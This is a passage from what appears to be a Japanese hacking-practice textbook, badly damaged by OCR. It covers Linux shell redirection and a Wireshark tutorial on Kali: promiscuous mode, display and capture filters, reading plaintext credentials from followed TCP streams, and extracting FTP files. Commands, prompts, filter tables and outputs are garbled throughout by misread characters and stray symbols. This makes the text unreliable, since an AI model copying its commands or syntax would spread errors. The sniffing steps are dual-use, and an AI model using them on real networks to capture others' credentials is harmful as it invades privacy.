レク トリ に は 、 ユ ー ザ ー 個 別 の 設定 ファ イル や デー タフ ァイル が 格納 され ます 。 


第 7 フィー ルド : ログ イン シェ ル 
ユー ザー が ログ イン し た と き に 起動 きれ る シェ ル で す 。/bin/nologin と な っ て 
いる 場合 、 ロ グイ ン は 許可 され ませ ん 。 


コマ ンド に 対す る 入出 力 
コマ ンド に 対す る 入出 力 に は 、 | 明示 的 な 入出 力 ] と | 暗黙 な 入出 力 ] が あり ま 
す 。 例 えば 、cp コマ ンド は 、 次 の 書式 で 実行 され ます 。 


$ cp 1le1 † ュ le2 


この と き 、 fie1 の 内 容 を 読み 込ん で 、 file2 に 書き 込む こと で 、 コ ピー 処理 を 実現 
し て いま す 。 操作 者 (コマ ンド を 入力 する 者 ) は 、fie1 や file2 に 具体 的 な ファ イ 
ル 名 や パス を 指定 し ます 。 つ まり 、 明 示 的 に コマ ンド に 対す る 入力 と 出力 を 指定 
し た こと に な り 、 こ うし た も の を 「 明 示 的 な 入出 力 ] と いい ます 。 
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と ころ で 、y オ プシ ョ ン を 指定 する と 、 冗長 モー ド に な り 、 コ ピー 処理 に 関す る 
メッ セー ジ が 表示 され ます 。 操作 者 は メッ セー ジ の 表示 場所 を 指定 し て いま せん 
が 、Terminal に 表示 され まし た 。 


roott 條 kal1:< 井 CD -v 千 ュ le1 fi]e2 
" 千 hle1' -> "' 千 ュ le2'" 


この 出力 先 は 誰が 決め て いる の で し ょ うか 。 そ れ は cp が 決め て いる の で す ( 実 
際 に は 、 後 述 する 標準 出力 を 使う よう に 実装 され て いる )。 こ れ ま で の 議論 は 出力 
に 関し て で し た が 、 入 力 に も 同様 の こと が いえ ます 。 こ うし た 入出 力 を 「 暗 黙 な 
入出 力 」 と いい ます 。 さ ら に 、 暗 黙 な 入力 を 標準 入力 、 暗 黙 な 出力 を 標準 出力 ( エ 
ラー メッ セー ジ の 出力 の 場合 は 標準 エラ ー 出 力 ) と いい ます 。 

以上 の こと を まとめ る と 、 コ マン ド に 対す る 入出 力 は 図 5.12 の よう に な り ま す 。 





標準 出力 (1) 
キー ボー ド ーーーーーーーーーーーーー ニ ーー サー 。。。 ーー キーーーーーーーーーーーーー p 「erminal 
ーー エーーーーーーーーーーーー 一 p 「errminal 
コマ ンド 引数 標準 エラ ー 出 力 ②) 
明示 的 な 入出 力 に 使わ れる - ニ ニーー 参 標準 デー タス トリ ー ム 


ファ イル や パス な ど を 含み ます 。 





ーーー を デー タス トリ ー ム で は な い 


図 5.12 コマ ンド に 対す る 入出 力 


標準 出力 

デー タス トリ ー ム と は 、 コ ンピュータ が 送 次 的 に 読み 書き する デー タ の こと で 
す 。 例え ば 、 キ ー ボ ー ド 、Termnal 画 面 (コン ソー ル 画 面 )、 フ ァイル な ども デー 
タス トリ ー ム と いえ ます 。 

標準 出力 と は 、 コ マン ド や プロ グラ ム の 出力 用 の デー タス トリ ー ム で す 。 デ 
フォ ルト で は Terminal に 出力 され ます 。 
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標準 出力 を 指定 し た ファ イル に リダイレクト する に は 、 次 の よう に 「>」 (上 書 
き ) や 「>>」 (追記 ) を 使い ます 。 


上 書き 


$ command > サ ュ le 


追記 
$ command >> † ュ le 
これ ら の 「>| や 「>>」 の 直前 に 、 暗 黙 の 入出 力 の ファ イル 記述 子 を 指定 で き 


ます 。 標準 出力 の ファ イル 記述 子 は 1 な の で 、「1>」 と 「>」 は 同じ 意味 に な り ま 
す 。 一般に 標準 出力 や 標準 入力 (後述 する ) の ファ イル 記述 子 は 省略 され ます 。 





root 個 ka11 :< 韻 Ca て 1> output . 上 x モ ファ イル 記述 子 を 指定 し た 。 
Hel1o. 

多 半 了 [ctr1] 十 [c] キ ー を 入力 する 。 

roott 個 ka11: < Ca output .tx 

Hel1o. 

roo て 合 kKa1 1 :-# Fm Output . 上 xt 

root 個 ka11 :<> 井 Cat > output .tx 二 ファ イル 記述 子 を 省略 し た 。 
Hel1o . 

^C 

Poott 個 ka11 : < 井 cat output . 上 x 


Hel1o. 結果 は 変わ ら な い 。 


標準 エラ ー 出 力 

標準 エラ ー 出 力 と は 、 エ ラー メッ セー ジ や 診断 メッ セー ジ を 出力 する た め の 特 
別 な 出力 用 デー タス トリ ー ム で す 。 デ フォ ルト で は Terminal に な っ て お り 、 標 準 
出力 と は 独立 に 存在 し て いま す 。 

例え ば 、 コ マン ド 実 行 時 の エラ ー メ ッ セ ー ジ を 標準 出力 で ファ イル に 保存 で き 
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る か を 確認 し ます 。 


root@Qka11 :<# cat -k hoge 

cat: invalid option -- 'k' 

Try "cat --help' for more 1nformation . 

root 仙 ka11 :< 井 ca -k hoge 1> error .txt 
cat: 1nvalid option -- 'k' エラ ー メ ッ セ ー ジ は 表示 され て いる 。 





Try "cat --help' †or more 1nformat1on . 
Foot 人 kal1 :<# 1s error . モ tx 
ePPOr . tx 


Poot 條 ka11 :<# Cat error. て tx 


"errortxt ファ イル は 存在 し ます が 、 中身 は 空 で し た 。 つ まり 、 エ ラー メッ セー 
ジ を ファ イル に 保存 で き て いま せん 。 

エラ ー メ ッ セ ー ジ を ファ イル に 記録 する に は 、 標 準 エ ラー 出力 を リダイレクト 
し ます 。 そ の た め に は 、 標 準 エ ラー 出力 の ファ イル 記述 子 で ある 2 を 指定 し ます 。 





標準 エラ ー を リダイレクト 。 エラ ー メ ッ セ ー ジ は 表示 され て いな いこ と に 注目 。 
Poo て 人 kal1 :<> 井 Cat -k hoge 2> error .txt 


Poot 人 kKal1 :># ca て error . て tx 上 
cat: 1nvalid optnon -- "'k" 
Try 「cat --help' †or more 1nformaton . 


'errortxt に エエ ラー メッセー ジ が 格納 され て いる こと が 確認 で きま し た 。 
標 進 出力 と 標準 エラ ー 出 力 を 複合 させ る と き は 、 次 の よう に 入力 し ます 。 


上 書き 


井 command 1> output .txt 2> error.tx 


追記 


# command 1>> output .tx て 上 2>> error .tx モ 
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標準 入力 

標準 入力 と は 、 コ マン ド や プロ グラ ム の 実行 時 の 入力 用 デー タス トリ ー ム の こ 
と で す 。 主 に キー ボー ド や ファ イル に な り ま す 。 

標準 入力 を 指定 し た ファ イル に リダイレクト する に は 、「<」 を 使い ます 。 標準 
入力 の ファ イル 記述 子 は 0 で す が 、 省 略 さ れる こと が 多い と いえ ます 。 


$ command 9< file 
また は 
$ command < ile 


実験 と し て 、Terminal を 2 つ 立 ち 上 げ て 、 そ れ ぞ れ を 端末 A と 端末 B と 呼ぶ こ 
と に し ます 。 端末 A で 次 の よう に 入力 し ます 。 


Poot 個 ka11:<# Cat > 1nput . モ x 
Hello Mor1d! 

ge 

Poo て 個 ka11 :-… 提 Ca て 1nput .t 上 xt 
Hello Mor1d! 

$cat 9< 1nput . て tx 

Hello Mor1d! 


端末 B で tty コマ ンド を 人 入力 し て 、 端末 の デパ イス ファ イル 名 を 確認 し ます 。 こ 
の Terminal は 義 じ な いで お きま す 。 


Poot 仙 ka11 :< 井 上 ty 


/dev/pts/1 
よっ て 、 端 末 B の デバ イス ファ イル 名 は "/dev/pts/1" と わか り ま し た 。 こ れ は 、 


各 Terminal の 名 札 の よう な 存在 で す 。 
端末 A で 次 の よう に 入力 し ます 。 こ れ は 標準 入力 と 標準 出力 を 同時 に リ ダ イ レ 
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クト し て いま す 。 


Poot 佑 ka11:<# 上 ty 
/dev/pts/9 端末 A の デバ イス ファ イル 名 。 先ほど と 違う 番号 の は ず 。 
Foot 個 ka11:<# cat 9< 1nput.txt > /dev/pts/1 


roo て 人 ka11 : ^ 提 何 も 表 示さ れ な い 。 





する と 、 端末 B に て 、 プ ロン プ ト 以 降 か ら "Hello World! (改行 含む ) が 表示 さ 
れ ま SG 


root@&ka1i :<# He11o Morld! 放電 
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はじめ に 


ター ゲッ ト 端 末 が 所 属す る LAN に アク セス で きる と 、 攻 撃 の パリ エー ショ 
ン が 増え 、 結 果 と し て ター ゲッ ト を 掌握 し や すく な り ま す 。 

本 草 で は 有線 LAN と 無線 LAN と いう ら つ の 側面 か ら 、LAN に 対す る ハッ 
キン グ に つい て 解説 し ます 。 様 々 な 実験 を 通じ て 、LAN の ハッ キン グ の 容易 
ざさ を 実 感 で きる は ず で す 。 ま た 、 ハ ルッキング ・ 有 ラボ の ネッ トワ ー ク を 守る た め 


の ヒン ト も 得 ら れ ま す 。 


ュ 


か 








ハッ キン グ を 体験 する 


5 


LAN の ハッ キン グ 





5 5N【/A や た コン ン / 








湊 Wireshark で パケ ッ ト を キャ プチ ャ する 

Wireshark は 、LAN に 流れ る デー タ を 取得 (キャ プチ ャ ) する ソフ トウ ェ ア で 
す 。 様々 な OS で 動作 し 、 GUI で 操作 で きま す 。 主 に 、 ネ ットワーク に 関す る トラ 
ブル を 解析 し た り 、 未 知 の 通信 を 解析 し た りす る と いう 目的 に 使わ れ ま す 。 


W ireshar に 


https //wwwrwiresha rk.org/ 





ネッ トワ リーク で デー タ を や り 取 りす る と き は 、 プ ロト コル に よっ て 決め られ た 
単位 で 分 割 さ れ ま す 。 こ の デー タ の 単位 の こと を 、 PDU (Protocol Data Unit) と 
呼び ます 。 こ の PDU は 、OSI 参 照 モ デル の レイ ヤー に よっ て 叶 び 名 が 変わ り ま す 
( 表 6-1)。 


表 6-1 レイ ヤー ご と の PDU の 呼び 名 


だ だ し 、TCP セ グ メ ント は よく TCP パケ ッ ト と も 呼ば れ ま す 。 つ まり 、 レ イ 
ヤー3 以 上 の PDU は パケ ッ ト と 呼ぶ こと も あり ます 。 

Wireshark で は 、LAN に 流れ る デー タ を 収集 し て 、 そ の 内 容 を 表示 し ます 。 実 
際 に は 、IP パ ケッ ト だ け で な く 、TCP セ グ メ ント や Ethernet フレ ー ム (MAC フ 
レー ム と 呼ば れる こと も 多い ) の 内 容 も 表示 し ます 。Wireshark の よう な デー タ を 
キャ プチ ャ する ソフ ト を パケ ッ ト キ ャ プチ ャ ソフ ト と 呼び ます が 、 実 際 に は パ 
ケッ ト 以 外 も キャ プチ ャ し て いる わけ で す 。 
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免 Wireshark の イン スト ー ル 


Wireshark に は バー ジョ ン 1 系 と 2 系 が あり ます が 、 本 書 で は 2 系 の Wireshark 
を 解読 し ます 。 

Windows 版 を イン スト ー ル する 場合 は 、 公 式 サ イト か ら イ ンス トー ラー を ダウ 
ン ロ ー ド し て 実行 し ます 。 キ ャ プチ ャ を 実現 する た め に は 、Npcap あ る い は 
WinPcap が 必要 で す 。Wireshark の イン スト ー ル 時 に WinPcap の イン スト ー ル を 
うな が され る の で 、 デ フォ ルト 設定 の まま イン スト ー ル し ます 。 

Linux 版 を イン スト ー ル する 場合 に は 、 ア プリ ケー ショ ン 管 理 ツ ー ル を 使っ て 
イン スト ー ル する こと を お すす めし ます 。 なぜなら 、 管 理 ツ ー ル を 通じ て イン ス 
トー ル す れ ば 、 バ バージョン アッ プ も 1 つの コマ ンド で 実現 で きる か ら で す 。 Kali に 
は デフ ォ ル ト で Wireshark が イン スト ー ル され て いま す 。 


免 プロ ミス キャ スモ ー ド 


パケ ッ ト を キャ プチ ャ する に は 、 基 本 的 に LAN ア ダブ プター を プロ ミス キャ ス 
(promiscuous) モー ド に し ます 。 プ ロミ スキ ャ スモ ー ド で な いと 、 自 分 の 端末 宛 
以外 の パケ ッ ト が 届い た と き 、LAN ア ダ プ ター は その パケ ッ ト を 無視 し ます 。 導 
に プロ ミス キャ スモ ー ド に する こと で 、 自 分 の 端末 宛 以 外 の パケ ッ ト も いっ た ん 
は LAN ア ダ プ ター が 処理 し ます 。 つ まり 、 こ の 時 点 で キャ プチ ャ で きる の で す 。 

Windows の Wireshark の 画面 を 例 に し ます 。| Capture Interfaces」 画面 に て 、 端 
末 の LAN ア ダ プ ター が 一 覧 表示 され ます 。「Promiscuous] と いう 列 が あり 、 これ 
が 「enabled」 に な っ て いれ ば 、 プ ロミ スキ ャ スモ ー ド が 有効 で ある こと を 意味 し 
ます ( 図 6-1) 。 
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Yrul Cpuk |、Optiats | 


| Emkerface Link-layer Header | Prormisouous | Snapien (日) Buffer ( Capture FLer 
| 『 ロー カル エリ ア 浴 桂 defau キ 2 


: Bluetooth ネッ トワ ー ク グ 技 続 

: VMware Network Adapter VMmet1 
『 NDCaep Loopbock た daXw 

: VirtualBox Host-Only Network 

。 VMware Network AdaXer VMnetB 
b。 ワリ イヤ レス ネッ トワ コーク 汰 

ト ワイ ヤレ ス キッ ト プ ー ク 湖 医 3 











記 Erchls nomiszn な mmus nm al marlares 


Capthre『 中 gr fre ssBolki inbar1sC68- 


LLS 」| ceee | meb | 





名 6-1 「Capture Interfaces」 画面 


僅 Wireshark の 起動 と キャ プチ ャ 


Kai の Wireshark を 使っ て 、 基 本 的 な 使い 方 を 解説 し ます 。 Kali の 仮想 マシ ン の 
ネッ トワ ー ク 設定 を 次 の よう な 構成 (第 2 章 で 説明 し た 標準 的 な 構成 ) に し ます 。 


アダ プター1 (無効 に し て も よい ) 


者 り 当 て : ホス ト オ ン リー アダ プター 
名 前 : VirtualBox Host-Only Ethernet Adapter 
IP アド レス : 10.0.0.2 ( 静 的 ) 


者 り 当 て : NAT 
IP アド レス : 10.0.3.15 ( 動 的 ) 
Wireshark の 実験 用 





1) Wireshark を 起動 する 
Terminal に 次 の よう に 入力 し て 、Wireshark を 起動 し ます 。 


Pootka11: < w1reshark 
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② エ ラー が 表示 され な いよ うに する 

Kali で Wireshark を 起動 する と 、 図 6.2 の よう な エラ ー ダ イア ログ が 表示 され る 
場合 が あり ます 。 root で 起動 し た た め 一 部 の 機能 が ロー ド で き な か っ た と いう エ 
eo ー で す 。 


Wireshark 


Lua: Error during !oadinQ: 

[strinq ' ハ usr/share ル wireshark/Init.Ua 圭 4 年 
dofille has been disabled due to runnInd 
Wireshark as superuser. See https:// 


W 放 ILwireshark.orq/CaptureSetup/ 
CapturePrivileqes for help In runninq Wireshark 


as an unD「iVileded user. 


6-2 "Lua:Error during loading" エラ ー 





エラ ー ダ イア ログ を 閉じ れ ぱ 通常 通り に キャ プチ ャ は で きま す 。 し か し 、 毎 回 
表示 され て し まう の で 、 こ の 機能 自体 を 無効 に し て エラ ー を 表示 し な いよ うに し 
ます 。 そ の た め に は 、/usr/share/wireshark/init.luna ファ イル を 次 の よう に 編集 
し ます 。 


Poot@Q⑱kal11:<# vV1 /usr/share/wireshark/ ュ ni て . ua 


"/usr/share/wireshark/init.1ua" フ ァイル (編集 前 ) 


--Set disable lua to true to disable Lua support. 
disable lua = false 


"/usr/share/wireshark/init.1ua" フ ァイル (編集 後 ) 


--Set disable lua to true to disable Lua support. 
disable lua = true 


ちな み に 、 こ の 設定 を 適用 し な いと tshark 起 動 時 に も 同じ エラ ー メ ッ セ ー ジ が 
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表示 され ます 。 


3③ キャ プチ ャ を 開始 する 

Wireshark の メニ ュー の 「Capture] > 「Options] を 選び ます 。 |Capture 
Interfaces」 画面 が 表示 され る の で 、 キ ャ プチ ャ し た い LAN ア ダ プ ター を 選択 し 
ます 。 Linux の 場合 、 こ こ に は LAN ア ダ プ ター 名 で は な く 、 イ ンタ ー フ ェ ー ス 名 
が 表示 され ます 。 NAT で ある ethl (アダ プター1 を 無効 に し て いる の で あれ ば 、 
eth0) を 選択 し ます 。 そ し て 、「Promiscuous] に チェ ッ ク が 入っ て いる こと を 確 
認 し て 、[Start」 ボタ ン を 押し ます 。 

する と 、 図 63 の よう な 画面 に な り ま す 。 


キャ プチ ャ の 操作 アイ コン 

















ー fwBB : : 計 3C2 : < お サ す : 日 。 f す 日 2 : : て 
2 } ぅ .003651 fe80 : : 9c2: < あけ f:6.。。 02: : で SSDP MS5 も 
3 6.005 72 fo88 : :S&dc2 <89f:6 fB2: : と SSDP 中 - く に 
中 了 。299648 fe86: :&C2! て 897 56.。。f182: 1 3 し LT 導 Sta 
5 7。 299765 9 。9 9。1 224 .9。$。254 LUW 才 Stam 
も 30 0 は 1 feB0 : : kc2 : で きす す : 5-。 ず す 2 : : で SSDP し お 
アナ 19.0937 19.8.@.1 1、『。@. ょ 55 NBNS Ns 
お 19.75 ち 3 は ヨ 18.8.9. 1 1 .B.@. ナ 55 NHK Nes 





9 311 KW14411 









| Fremwe 5: 7 bytes on nire (5O0 bits)。 7 bytes captsred (600 bits) om nterface @ 
| Etihwrmot ii。 Sr て : Ga:BO:27:BO:GG:11 (9Oa:BO:27:BB:GB:11 ) 。 Bst: PVv4mcas そ て fc (dl:BO:So:BO:Gg:f と ] 
| Tmtermet Protoco] Versiom き 。 Src 19.0.@.1。 Dst: 224.9.0.252 
) Uizor Da で sansw Protacol 。 Src Por そ で : 53323 (S3323) 。 Ds で Port: 53SS (5355] 
< Lirk-10Ca ぁ 1 ult1CaSt Me EsOolutiom (中 erY]) 

fransact3on ID: も ac も 

Flags: SnBBGG Standard deory 

Qacstiomws: 1 

Ankuor Ks: 8 
あ thor3ty RRS: 9 









パケ ッ ト 詳 細部 













NRN41 NT 


パケ ッ ト デ ー タ 部 








| Pdkstr 4- Dino 3 日時 NN | wie WWLAN 





人 ププ mbsr or wowert in pocka1 (dme cgm1anewsl # kwtps 


図 6-3 Wireshark の キャ プチ ャ 画面 


パケ ッ ト 詳 細部 で は 、 パ ケッ ト 一 覧 部 で 選択 し た パケ ッ ト の 内 容 を わか りや す 
く 表示 し ます 。 バケ ッ ツ ト デ ー タ 部 で は 、 パケ ッ ト を 16 進 数 で 表示 し ます 。 
な お 、 左 上 の アイ コン を 押す こと で 、 キ ャ プチ ャ を 開始 ・ 停 止 で きま す 。 
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④HTTP の バケット を 観察 する 

この 状態 で Firefox を 起動 し て 、1 分 ほど イン ター ネッ ト を 巡回 し て み ま す 。 
Protocol 列 に 注目 する と 、 様 々 な プロ トコ ル (TCP、UDP、TLS な ど ) が 表示 さ 
れ て いま す 。 パ ケッ ト の 表示 が 速い た め 、 実 際 に 解析 する 際 に は 表示 フィ ル タ を 
用 いま す (詳細 は 後述 )。 

ここ で は 、 表示 フィ ル タ に 「http」 と 入力 し て 、HTTP の パケ ッ ト を 表示 し て み 


ます ( 図 64)。 


① 表 示 フ ィ ル タ に 「http」 ② パ ケッ ト 一 覧 部 に HTTP に 関連 
を 指定 し ます 。 する も の だ けが 表示 され ます 。 
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図 6.4 HITTP に よる フィ ル タ リ ング 


Protocol 列 に 注目 する と 、HTTP 以 外 に OCSP も 表示 され て いま す 。OCSP は 、 
公開 鍵 証 明 書 の 失効 状態 を 取得 する た め の 通 信 プ ロト コル で す 。 パ ケッ ト の 詳細 
を 確認 する と 、POST メ ソ ッ ド が 使わ れ て いま す 。 

また SSDP が 表示 され る こと も あり ます 。 こ れ を 除外 し た けれ ば 、 表示 フ ィ ル タ 
に 「http る tcp] と 入力 し ます 。 ま た 、HTTP 要 求 の GET メソッド だ け を 抽出 
する に は 、 表 示 フ ィ ル タ に |httprequestmethod == "GET | と 入力 し ます 。 
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Vi の 操作 に 慣れ て お こう 


最近 の Linux デ ィ ス トリ ビュ ーション に は 、 直 感 的 か つ GUI で 操作 で きる エ 
ディ ター が イン スト ー ル され て いま す 。 し か し 、 ト ラブ ル の 発生 時 に は 限ら れ た 
コマ ンド し か 利用 で き な い 場面 が あり ます 。 ま た 、Linux で あれ ば どの よう な 環境 
で も を 利用 で きま す 。 

vi は 慣れ て いな いと 扱い に くい と 感じ る か も し れ ま せん が 、 基 本 スキ ル と も い 
える の で 身 に つけ て お くべ き で す 。 設定 ファ イル を 編集 する 程度 で あれ ば ぱ ば 、 表 6-2 
の コマ ンド だ け で も 十分 で す 。 


表 6-2 最低 限 知 っ て お くべ ぺき コマ ンド 


= | イン ター ト e-FA 
k emm 
aa mW 


WV | 上 書き 保存 
EG | 終 了 
dd | 保存 せ ず に 終了 )) 


現状 の モー ド や コマ ンド が わか ら な く な っ た ら 、[ESC] キー を 連打 し て 「:ql」 
を 入力 し ます 。 保存 せ ず に 終了 で きる の で 、 問 題 は 起こ り ま せん 。 





代表 示 フ ィ ル タ 


表示 フィ ル タ (ディ スプ レイ フィ ル タ ) と は 、 キ ャ プチ ャ し た 結果 を 表示 する 
際 に 、 特 定 の パケ ッ ト の み に 絞 り 込 むための 機能 で す 。 表 示 フ ィ ル タ は 、 後 述 す 
る キャ プチ ャ フィ ル タ よ り も 拡張 され て いま す 。 さ ら に 、 フ ィ ル タ を 変更 し て も 
キャ プチ ャ を や り 直 す 必 要 は あり ませ ん 。 

記録 され た パケ ッ ト は 膨大 で ある た め 、 調 査 する パケ ッ ト に 目 星 を 付け ます 。 
そし て 、 必 要 な パケ ッ ト の み を 表示 する た め に 表示 フィ ル タ を 活用 し ます 。 

キャ プチ ャ 画面 の 上 部 に ある Filter 欄 に 、 表 示 フ ィ ル タ の 構文 を 入力 し ます 。 
Filter 欄 に 何 も 入 力 し な けれ ば 、 フ ィ ル タ は 適用 され ませ ん 。 つ まり 、 パ ケッ ト 一 
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覧 部 に は すべ て の パケ ッ ト が 表示 され ます 。 例え ば 、Filter 欄 に [ip.addr == 
1000.1」 と 入力 する と 、( 送 信 元 ある い は 宛先 の ) IP アド レス が 1000.1 の パケ ッ 
ト の み が パ ケッ ト 一 覧 部 に 表示 され ます 。 

表示 フィ ル タ の 構文 を すべ て 覚え る 必要 は あり ませ ん 。Filter 欄 の 左右 に ある ア 
イコ ン を 押す と 、 ヘ ルプ や 例 が 表示 され ます 。 表示 フ ィ ル タ の 例 を 表 6.3 に 示し ま 


す C1) C2)。 


表 6-3 よく 使う 表示 フィ ル タ 
ラン レル る タ の 科 立 。 {0 


ID.SrC == 10.0.0.1/24 


{CD.DOrt == 80 
{CD.SrCDOrt == 80 
tCD.dStDort == 80 
tcD.port < 1024 
tcD.Dort <= 1023 
tCD.flI3gS.aCK == 
tcD.flagS.reset == 1 
http.requeSst 


(http.requestmethod == "GET') 
(http.requestmethod == "POST) 


tcp Contains traffic 


ID.addr == 10.0.0.1 


ID.addr == 10.0.0.1 && ip.addr == 10.0.0.2 


送信 元 あ る い は 宛先 が 10.0.0.1 で ある パケ ッ ト 
を 表示 する 。 


10.0.0.1 と 10.0.0.2 間 の 通信 を 表示 する 。 


送信 元 IP アド レス が 10.0.0.1/24 の パケ ッ ト を 
表示 する 。 


宛先 ポー ト が 80 の パケ ッ ト を 表示 する 。 


ポー ト 番 号 が 1024 (TCP) 未満 の パケ ッ ト を 表 
示す る 。 


HTTP 要 求 に お ける GET メソ ッ ド また は POST 
メゾ ッ ド を 表示 する 。 

*traffic" と いう 文字 列 を 含む TCP パケ ッ ト を 表 
示す る 。 

ユー ザーID と いっ た 特定 の 文字 列 を 含ん で いる 
パケ ッ ト を 調べ る 際 に 便利 と いえ る 。 


| 説 8 | 





> TP ラロ ト コル ea*e な い 、 


*1 : WIRESHRK ) DisplayFilters 


https//wikiwireshark.org/DisplayFilters 


2 : Top 10 Wireshark Filters 


http//www.loyemytoolcom/blog/2010/04/top-10-wireshark-tilters-by-chris-greer.html 
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ARP や ICMP や DNS で な い プ ロト コル を 表示 す 
(arD Or ICmD Or dnS) る 。 
調べ た い パ ケッ ト に 集中 で きる 。 


udp contains 33:27:58 "0x33 0x27 0x58" を 含む UDP を 表示 する 。 


TCP の Retransmission (再送 ) を 表示 する 。 
tcp.analysis.retransmission パケ ッ ト ロ ス の トラ ブル シュ ー テ ィング 、 ソ フト 
ウェ ア の パフ ォ ー マ ンス の 調査 に 活用 で きる 。 


frame matches "FLAG* 文字 列 "FLAG" を 含む パケ ッ ト を 表示 する 。 





@ キャ プチ ャ フィ ル タ 

キャ プチ ャ フィ ル タ と は 、 特 定 の パケ ッ ト の み を 取得 し た い 場 合 に 利用 する 
フィ ル タ で す 。 キャ プチ ャ する パケ ッ ト の 量 が 少な く な る た め 、 ス トレ ー ジ の 圧 
迫 を 軽減 で きま す (3) 。 

メニ ュー の 「Capture」 > [Capture Filters」 を 選び ます 。「Capture Filters」 画 
面 が 表示 され る の で 、 こ こ で 適用 し た い キ ャ プチ ャ フィ ル タ を 選択 し ます ( 図 
6-5) 。 一覧 に 載っ て いな い 場 合 は 、 左 下 の [+] ボタ ン を 押し ます 。 








| ERer hocr 00:OO:5e:00:53:00 
eSher F で to CxGe0O 
mt brogdoa5A gmd not mtoa 天 
誠 9「D 
ー 
hoe% 193.9.2.1 
p9 
hoeX 200』:db6:i1 


に < 


2 
pt 50 
Kp POrt PKKD 
ffDOPNd DO OL 53 
Nor-HTTP and nof-9MTP Oo wwvr weshok-ofd PA PO 0 nnO met DO 5 rm hoet wwm mi 








図 6.5 「Capture Filters」 画面 


3: ネッ トワ ー ク 隆 害 を 解析 する 際 に は 、 キ ャ プチ ャ フィ ル タ を 適用 せ ず に 全 パ ケッ ト を キャ プ 
チャ する の が 一 般 的 で す 。 例 えば 、TCP だ け を 使用 する と 思っ て いた アプ リ が 、 実 際 は UDP を 
使用 し て いる と いう こと も あり える か ら で す 。 
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キャ プチ ャ フィ ル タ の 性 質 上 、 キ ャ プチ ャ の 開始 前 に キャ プチ ャ フィ ル タ を 設 
定 し な けれ ば な り ま せん 。 キ ャ プチ ャ フィ ル タ の 構文 は 、 tcpdump ("4) で 用 いら 
れる も の と 同様 で す 。 キ ャ プチ ャ フィ ル タ の 例 を 表 6-4 に 示し ます (55)。 


表 6-4 キャ プチ ャ フィ ル タ の 例 


ip Src host 10.0.0.2 | 送信 元 IP アド レス が 10.0.0.2 の パケ ッ ト だ け を キャ プチ ャ する 。 


pot53 | ポー ト 53、 す な わ ち DNS の 通信 を キャ フチ ャ する 。 


tcp dst port 80 宛先 ポー ト 番 号 が 80 の パケ ッ ト だ け を キャ プチ ャ する 。 


ICMP パ ケッ ト 以 外 を キャ プチ ャ する 。 


Ethernet フ レー ム の タイ プ が IP の も の を キャ プチ ャ する 。 iD は キー ワー 
ether proto \ip ド に 使わ れ て いる の で 、 値 (ここ で は フレ ー ム タイ プ ) と し て 使う 場合 
に は バッ クス ラッ シュ (\) を 付け る 。 





人 @ キャ プチ ャ し た デー タ の 保存 


キャ プチ ャ し た デー タ は 、 基 本 的 に pcap 形 式 あ る い は pcapng 形 式 で 保存 し ま 
す 。 メニュー の 「File」 > 「Save as」 か ら 保存 で きま す 。 pcap 形式 は 従来 の キャ 
プチ ャ ファ イル で 用 いら れ て いま す 。 な お 、 今 の Wireshark は pcapng 形 式 で 保存 
し よう と し ます 。 pcapng 形 式 の 方 が 高 機能 で す が 、 サ ボー ト し て いる ソフ トウ ェ 
ア が 少な い の で pcap 形式 が 好ま れる 場面 も あり ます 。 

も し テキ スト エディ ター で 参照 し た い 場 合 は 、 テ キス ト 形 式 で エク スポ ー ト し 
て お きま す 。 メ ニュ ー の 「File」 > 「Export Packet Dissections] > 「As Plain 
Text」 で 出力 で きま す 。 エ クス ポー ト し た 際 に も 、pcap フ ァイル は 残し て お きま 
し よう 。 


4 : 古く か ら あ る パケ ッ ト キ ャ プチ ャ ソフ ト で す 。CUI で 操作 し ます 。 
https//wwwr.tcpdump.org/ 


5 : WIRESHARK CaptureFilters 
https//wikiwireshark.org/CaptureFilters 
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@ スト リー ム を 表示 する 

通信 は パケ ッ ト ( 厳 審 に は フレ ー ム ) と いう 形 で や り 取 りさ れ ま す 。 巨大 な デー 
タ を 送る 際 に パケ ッ ト サ イズ の 上 限 値 を 超え な いよ うに 、 複 数 の パケ ッ ト に 分 割 
され ます 。 ま た 、 パ ケッ ト が 分 割 さ れ な く て も 、1 つ の セッ ショ ン で 何 度 か デー タ 
を 互い に や り 取 りす る こと も あり ます 。 こ うし た 場面 に お いて 、 セ モッ シ ョ ン 内 で 
何 が 起き た の か を 把握 する に は 、1 つ 1 つの パケ ッ ト を 見 る より 、 全 体 の 流れ を 見 
た 方 が よい と いえ ます 。 

メニ ュー の 「Analyze」 > 「Follow」 に 「TCP Stream」 「UDP Stream」 [SSL 
Stream」 と いう 項目 が あり ます 。 こ れ ら を 選択 する と 、 一 連 の デー タ を 連続 し て 
表示 し ます ( 図 66)。 デ フォ ルト で は ASCII が 指定 され て お り 、 文字 化け し て いな 
い 部 分 は 読み 取れ ます 。 デ ー タ 内 に テキ スト が あれ ば 、 こ こ で 読み 取れ ます 。 

例え ば 、 平文 で 認証 デー タ (ユー ザー 名 や パス ワー ド ) が 送信 され て いれ ば ぱ 、 こ 
こ で 簡単 に 確認 で きま す 。 
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図 6-6 Anonymous FTP 通 信 の や り 取 り 


また 、HTTP に お ける 、 リ クエ スト と レス ポン ス の や り 取 り を 確認 する 際 に も 
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便利 で す ( 図 6-7)。 
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6-7 HTTP の Web 認 証 の 際 の や り 取 り 


@ ファ イル の デー タス トリ ー ム を 抽出 する 


表示 フィ ル タ に |ftp or ftpdata」 と 入力 し ます 。 パ ケッ ト 一 覧 部 に パケ ッ ト が 
存在 すれ ば 、FTP 通 信 が あり ます 。 ftp は FTP の 制御 用 通信 で あり 、ftp-data は 
デー タ 用 の 通信 で す 。 フ ァイル を 抽出 する に は 、fftp-data に 注目 し ます 。 そこで 、 
表示 フィ ル タ に 「ftp-datal を 入力 し ます 。 

パケ ッ ト 一 覧 部 に て 、 抽 出し た い デ ー タ を 含む パケ ッ ト を 選択 し ます 。 右 ク 
リッ ク の 「Follow」 > [TCP Stream」 を 表示 し ます 。 デ フォ ルト で は ASCII で 表 
示さ れ て いる の で 、"Show data as を 「RAW」 に 変更 し て か ら 、[Save as] ボタ 
ン を 押し て 出力 し ます ( 図 6.8)。 そ の 際 、 フ ァイル 名 は 任意 で よい の で す が 、 拡張 
子 を 正確 に 入力 し ます 。ASCII 表 示 時 に 「PK」 と 出 て いれ ば zijp 形式 な の で 、 出力 
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ファ イル 名 を "outputzip な ど に し ます 6)。 






Wiregnsrk Fo > ・】 nom rm ' 
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exer て 1se , の 18。 。 | 6. し 。。F 彰 。 に に 1 NSR ne ce 連 。 。 

0 -] . - -9.P..-P.- yaYUK WP:: 四 1 TP 記 0 


